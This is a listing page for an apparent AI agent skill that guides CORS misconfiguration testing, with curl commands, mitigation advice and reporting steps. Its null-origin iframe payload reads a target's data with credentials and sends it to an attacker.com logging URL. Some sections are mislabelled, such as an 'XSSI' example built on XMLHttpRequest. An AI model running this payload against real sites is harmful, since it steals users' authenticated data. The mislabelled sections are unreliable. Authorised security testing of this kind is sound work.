OpenSkillIndex← back to search

Hacktricks-skills cors-bypass

Test for Cross-Origin Resource Sharing (CORS) misconfigurations and bypass vulnerabilities. Use this skill whenever you need to audit web applications for CORS security issues, test Origin header validation, check for credential leakage, or explore DNS rebinding attacks. Trigger this skill for any web security assessment involving cross-origin requests, API security testing, or when investigating potential data exfiltration through CORS. Make sure to use this skill when the user mentions CORS, cross-origin, Origin header, web security testing, API security, or any scenario involving browser-based access to external resources.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/cors-bypass/SKILL.MD
source content

CORS Bypass Testing

A comprehensive guide for testing Cross-Origin Resource Sharing (CORS) misconfigurations and bypass techniques.

When to Use This Skill

  • Auditing web applications for CORS vulnerabilities
  • Testing API endpoints for cross-origin security
  • Investigating potential credential leakage
  • Exploring DNS rebinding attack vectors
  • Bug bounty hunting for CORS misconfigurations
  • Security assessments of internal network access controls

Core Concepts

Same-Origin Policy

The browser enforces that resources can only be accessed from the same protocol, domain, and port. CORS relaxes this restriction when properly configured.

Key CORS Headers

  • Access-Control-Allow-Origin
    : Specifies which origins can access the resource
  • Access-Control-Allow-Credentials
    : Whether credentials (cookies, auth headers) can be sent
  • Access-Control-Allow-Methods
    : Which HTTP methods are permitted
  • Access-Control-Allow-Headers
    : Which headers can be included in requests
  • Access-Control-Expose-Headers
    : Which response headers are exposed to the client
  • Access-Control-Max-Age
    : How long preflight results can be cached

Testing Methodology

1. Initial Reconnaissance

Start by identifying all endpoints that handle cross-origin requests:

# Check for CORS headers in responses
curl -I -H "Origin: https://attacker.com" https://target.com/api/endpoint

# Test with different origins
curl -I -H "Origin: https://evil.com" https://target.com/api/endpoint
curl -I -H "Origin: null" https://target.com/api/endpoint

2. Origin Header Testing

Test various origin values to see how the application responds:

# Test wildcard reflection
curl -I -H "Origin: https://attacker.com" https://target.com/api/

# Test null origin
curl -I -H "Origin: null" https://target.com/api/

# Test with subdomain variations
curl -I -H "Origin: https://target.attacker.com" https://target.com/api/
curl -I -H "Origin: https://attacker.target.com" https://target.com/api/

3. Credential Testing

Verify if credentials are being sent with cross-origin requests:

# Check if credentials are allowed
curl -I -H "Origin: https://attacker.com" -H "Cookie: session=abc123" https://target.com/api/

# Test with Authorization header
curl -I -H "Origin: https://attacker.com" -H "Authorization: Bearer token" https://target.com/api/

4. Preflight Request Testing

Test OPTIONS preflight requests to understand allowed methods and headers:

# Send preflight request
curl -X OPTIONS https://target.com/api/ \
  -H "Origin: https://attacker.com" \
  -H "Access-Control-Request-Method: POST" \
  -H "Access-Control-Request-Headers: Authorization"

5. Regex Bypass Testing

Test for regular expression bypasses in origin validation:

# Test with special characters
curl -I -H "Origin: https://target.application_.arbitrary.com" https://target.com/api/
curl -I -H "Origin: https://target.application}.arbitrary.com" https://target.com/api/

# Test with subdomain variations
curl -I -H "Origin: https://attacker.target.com.evil.com" https://target.com/api/
curl -I -H "Origin: https://target.com.attacker.com" https://target.com/api/

6. DNS Rebinding Testing

Explore DNS rebinding attack vectors:

# Test with localhost variations
curl -I -H "Origin: https://127.0.0.1" https://target.com/api/
curl -I -H "Origin: https://0.0.0.0" https://target.com/api/

# Test with internal IPs
curl -I -H "Origin: https://192.168.1.1" https://target.com/api/
curl -I -H "Origin: https://10.0.0.1" https://target.com/api/

Common Vulnerabilities

Origin Reflection

Vulnerability: Application reflects the origin header without validation.

Test:

curl -I -H "Origin: https://attacker.com" https://target.com/api/
# Check if response contains: Access-Control-Allow-Origin: https://attacker.com

Impact: Allows any origin to access protected resources.

Wildcard Origins

Vulnerability: Application uses 

*
for 
Access-Control-Allow-Origin
.

Test:

curl -I https://target.com/api/
# Check if response contains: Access-Control-Allow-Origin: *

Impact: May allow unauthorized access to resources.

Null Origin

Vulnerability: Application accepts 

null
as a valid origin.

Test:

curl -I -H "Origin: null" https://target.com/api/
# Check if response contains: Access-Control-Allow-Origin: null

Impact: Can be exploited through sandboxed iframes.

Subdomain Takeover

Vulnerability: Application validates subdomains but not the main domain.

Test:

curl -I -H "Origin: https://attacker.target.com" https://target.com/api/
# Check if response allows this origin

Impact: Allows attackers to use subdomains to access resources.

DNS Rebinding

Vulnerability: Application doesn't validate the Host header.

Test:

# Use DNS rebinding tools like Singularity
# Test with localhost and internal IPs

Impact: Allows attackers to access internal resources through DNS rebinding.

Exploitation Techniques

XSSI (Cross-Site Script Inclusion)

Test for JSONP vulnerabilities:

<script>
  var req = new XMLHttpRequest();
  req.onload = function() {
    console.log(this.responseText);
  };
  req.open('GET', 'https://target.com/api/data?callback=callback');
  req.send();
</script>

Null Origin Exploitation

Create a sandboxed iframe to exploit null origin:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms"
  src="data:text/html,<script>
  var req = new XMLHttpRequest();
  req.onload = function() {
    location='https://attacker.com/log?key='+encodeURIComponent(this.responseText);
  };
  req.open('GET','https://target.com/api/data',true);
  req.withCredentials = true;
  req.send();
</script>"></iframe>

Local Network Bypass

Test for local network access bypass:

# Test with 0.0.0.0 (works on Linux/Mac)
curl -I -H "Origin: https://0.0.0.0" https://target.com/api/

# Test with public IP of local endpoint
curl -I -H "Origin: https://public-ip.local" https://target.com/api/

Mitigation Strategies

Proper Origin Validation

  • Implement strict origin validation on the server side
  • Use a whitelist of allowed origins
  • Avoid reflecting the origin header without validation

Credential Handling

  • Only send credentials when necessary
  • Use secure authentication mechanisms
  • Implement proper session management

DNS Security

  • Validate the Host header
  • Use DNSSEC to prevent DNS spoofing
  • Implement proper DNS caching policies

Regular Audits

  • Conduct regular security audits
  • Test for new vulnerabilities
  • Update security policies as needed

Tools and Resources

Automated Scanners

Manual Testing

  • Burp Suite: CORS extension
  • Browser Developer Tools: Network tab for CORS headers
  • Custom Scripts: For targeted testing

Documentation

Reporting Findings

When documenting CORS vulnerabilities:

  1. Include the endpoint URL
  2. Show the request with Origin header
  3. Show the response with CORS headers
  4. Explain the impact
  5. Provide proof of concept
  6. Suggest mitigation

References